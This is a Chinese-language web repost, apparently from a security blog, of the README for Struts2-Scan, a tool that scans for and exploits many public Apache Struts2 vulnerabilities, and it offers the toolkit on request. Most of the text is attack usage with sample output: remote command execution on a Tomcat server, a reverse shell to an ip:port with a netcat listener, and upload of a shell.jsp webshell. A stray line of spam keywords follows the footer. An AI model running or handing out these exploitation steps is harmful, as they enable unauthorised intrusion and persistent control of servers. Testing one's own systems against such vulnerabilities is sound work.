<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Struts2全漏洞掃描利用工具

    VSole2021-07-22 07:50:41


    Struts2-Scan

    • Struts2漏洞利用掃描工具,基于互聯網上已經公開的Structs2高危漏洞exp的掃描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057
    • 支持單個URL漏洞檢測和批量URL檢測,至此指定漏洞利用,可獲取WEB路徑,執行命令,反彈shell和上傳文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持



    行環境

    • Python3.6.X及其以上版本
    • 第三方庫: click, requests, bs4
    • 測試環境: Ubuntu 16.04
    • 漏洞環境已上傳,參考地址:
    • https://github.com/Medicean/VulApps/tree/master/s/struts2/
    • https://github.com/vulhub/vulhub/tree/master/struts2


    工具參數說明

    Usage: Struts2Scan.py [OPTIONS]
    
      Struts2批量掃描利用工具
    
    Options:
      -i, --info          漏洞信息介紹
      -v, --version       顯示工具版本
      -u, --url TEXT      URL地址
      -n, --name TEXT     指定漏洞名稱, 漏洞名稱詳見info
      -f, --file TEXT     批量掃描URL文件, 一行一個URL
      -d, --data TEXT     POST參數, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
      -c, --encode TEXT   頁面編碼, 默認UTF-8編碼
      -p, --proxy TEXT    HTTP代理. 格式為http://ip:port
      -t, --timeout TEXT  HTTP超時時間, 默認10s
      -w, --workers TEXT  批量掃描進程數, 默認為10個進程
      --header TEXT       HTTP請求頭, 格式為: key1=value1&key2=value2
      -e, --exec          進入命令執行shell
      --webpath           獲取WEB路徑
      -r, --reverse TEXT  反彈shell地址, 格式為ip:port
      --upfile TEXT       需要上傳的文件路徑和名稱
      --uppath TEXT       上傳的目錄和名稱, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
      -q, --quiet         關閉打印不存在漏洞的輸出,只保留存在漏洞的輸出
      -h, --help          Show this message and exit.
    









    使用例子

    查看漏洞詳細信息:

    $ python3 Struts2Scan.py --info
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    [+] 支持如下Struts2漏洞:
    [+] S2-001:影響版本Struts 2.0.0-2.0.8; POST請求發送數據; 默認參數為:username,password; 支持獲取WEB路徑,任意命令執行和反彈shell
    [+] S2-003:影響版本Struts 2.0.0-2.0.11.2; GET請求發送數據; 支持任意命令執行
    [+] S2-005:影響版本Struts 2.0.0-2.1.8.1; GET請求發送數據; 支持獲取WEB路徑,任意命令執行
    [+] S2-007:影響版本Struts 2.0.0-2.2.3; POST請求發送數據; 默認參數為:username,password; 支持任意命令執行和反彈shell
    [+] S2-008:影響版本Struts 2.1.0-2.3.1; GET請求發送數據; 支持任意命令執行和反彈shell
    [+] S2-009:影響版本Struts 2.0.0-2.3.1.1; GET請求發送數據,URL后面需要請求參數名; 默認為: key; 支持任意命令執行和反彈shell
    [+] S2-012:影響版本Struts Showcase App 2.0.0-2.3.13; GET請求發送數據,參數直接添加到URL后面; 默認為:name; 支持任意命令執行和反彈shell
    [+] S2-013/S2-014:影響版本Struts 2.0.0-2.3.14.1; GET請求發送數據; 支持獲取WEB路徑,任意命令執行,反彈shell和文件上傳
    [+] S2-015:影響版本Struts 2.0.0-2.3.14.2; GET請求發送數據; 支持任意命令執行和反彈shell
    [+] S2-016:影響版本Struts 2.0.0-2.3.15; GET請求發送數據; 支持獲取WEB路徑,任意命令執行,反彈shell和文件上傳
    [+] S2-019:影響版本Struts 2.0.0-2.3.15.1; GET請求發送數據; 支持獲取WEB路徑,任意命令執行,反彈shell和文件上傳
    [+] S2-029:影響版本Struts 2.0.0-2.3.24.1(除了2.3.20.3); POST請求發送數據,需要參數; 默認參數:message; 支持任意命令執行和反彈shell
    [+] S2-032:影響版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET請求發送數據; 支持獲取WEB路徑,任意命令執行和反彈shell
    [+] S2-033:影響版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET請求發送數據; 支持任意命令執行和反彈shell
    [+] S2-037:影響版本Struts 2.3.20-2.3.28.1; GET請求發送數據; 支持獲取WEB路徑,任意命令執行和反彈shell
    [+] S2-045:影響版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST請求發送數據,不需要參數; 支持獲取WEB路徑,任意命令執行,反彈shell和文件上傳
    [+] S2-046:影響版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST請求發送數據,不需要參數; 支持獲取WEB路徑,任意命令執行,反彈shell和文件上傳
    [+] S2-048:影響版本Struts 2.3.x with Struts 1 plugin and Struts 1 action; POST請求發送數據; 默認參數為:username,password; 支持任意命令執行和反彈shell
    [+] S2-053:影響版本Struts 2.0.1-2.3.33,2.5-2.5.10; POST請求發送數據; 默認參數為:username,password; 支持任意命令執行和反彈shell
    [+] S2-devMode:影響版本Struts 2.1.0-2.3.1; GET請求發送數據; 支持獲取WEB路徑,任意命令執行和反彈shell
    

    單個URL漏洞檢測:

    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    [+] 正在掃描URL:http://192.168.100.8:8080/index.action
    [*] ----------------results------------------
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-046
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-016
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-045
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-015
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-009
    [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-012
    

    批量漏洞檢測:

    $ python3 Struts2Scan.py -f urls.txt
    

    POST數據:

    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}
    

    指定漏洞名稱利用:

    # 命令執行
    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    >>>ls -la
    total 136
    drwxr-sr-x 1 root staff  4096 May  5  2017 .
    drwxrwsr-x 1 root staff  4096 May  5  2017 ..
    -rw-r----- 1 root root  57092 Apr 13  2017 LICENSE
    -rw-r----- 1 root root   1723 Apr 13  2017 NOTICE
    -rw-r----- 1 root root   7064 Apr 13  2017 RELEASE-NOTES
    -rw-r----- 1 root root  15946 Apr 13  2017 RUNNING.txt
    drwxr-x--- 1 root root   4096 May  5  2017 bin
    drwx--S--- 1 root root   4096 Jul 12 14:54 conf
    drwxr-sr-x 3 root staff  4096 May  5  2017 include
    drwxr-x--- 2 root root   4096 May  5  2017 lib
    drwxr-x--- 1 root root   4096 Jul 12 14:54 logs
    drwxr-sr-x 3 root staff  4096 May  5  2017 native-jni-lib
    drwxr-x--- 2 root root   4096 May  5  2017 temp
    drwxr-x--- 1 root root   4096 Jul 12 14:54 webapps
    drwxr-x--- 1 root root   4096 Jul 12 14:54 work
    >>>
    
    # 反彈shll
    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    [*] 請在反彈地址處監聽端口如: nc -lvvp 8080
    
    # 獲取WEB路徑
    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    [*] /usr/local/tomcat/webapps/ROOT/
    
    # 上傳shell
    $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp
    
     ____  _              _       ____    ____                  
    / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
    \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
     ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
    |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
    
                                          Author By HatBoy        
    
    [+] 文件上傳成功
    

    訂閱號內回復 Struts2 獲取工具包


    如侵權請私聊公眾號刪文

    漏洞掃描struts2漏洞
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Struts2漏洞利用掃描工具,基于互聯網上已經公開的Structs2高危漏洞exp的掃描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-
    首先恭喜你發現了寶藏。本項目集成了全網優秀的攻防武器項目,包含信息收集工具,漏洞利用工具,內網滲透工具、應急響應工具、甲方運維工具、等其他安全資料項目,供攻防雙方使用。
    首先恭喜你發現了寶藏。本項目集成了全網優秀的攻防武器項目,包含信息收集工具(自動化利用工具、資產發現工具、目錄掃描工具、子域名收集工具....etc...),漏洞利用工具(各大CMS利用工具、中間件利用工具等項目),內網滲透工具、應急響應工具、甲方運維工具、等其他安全資料項目,供攻防雙方使用。
    VulmapVulmap是一款功能強大的Web漏洞掃描和驗證工具,該工具可以對Web容器、Web服務器、Web中間件以及CMS等Web程序進行漏洞掃描,并且具備漏洞利用功能。廣大安全研究人員可以使用Vulmap檢測目標是否存在特定漏洞,并且可以使用漏洞利用功能驗證漏洞是否真實存在。工具安裝首先,我們需要在本地系統中安裝并配置好Python 3環境,我們推薦使用Python 3.7或更高版本。
    避免網站顯示SQL錯誤信息,比如類型錯誤、字段不匹配等,防止攻擊者利用這些錯誤信息進行一些判斷。
    Part1 前言 大家好,我是ABC_123,不知不覺,我一個人已經連續寫了51篇原創文章了。本期復盤一次
    微步在線監測到一個長期針對報社媒體企業實施定向攻擊的 APT 團伙,由于該團伙成員手法老道且經驗豐富,我們將命名為“OldFox”(老狐貍)
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类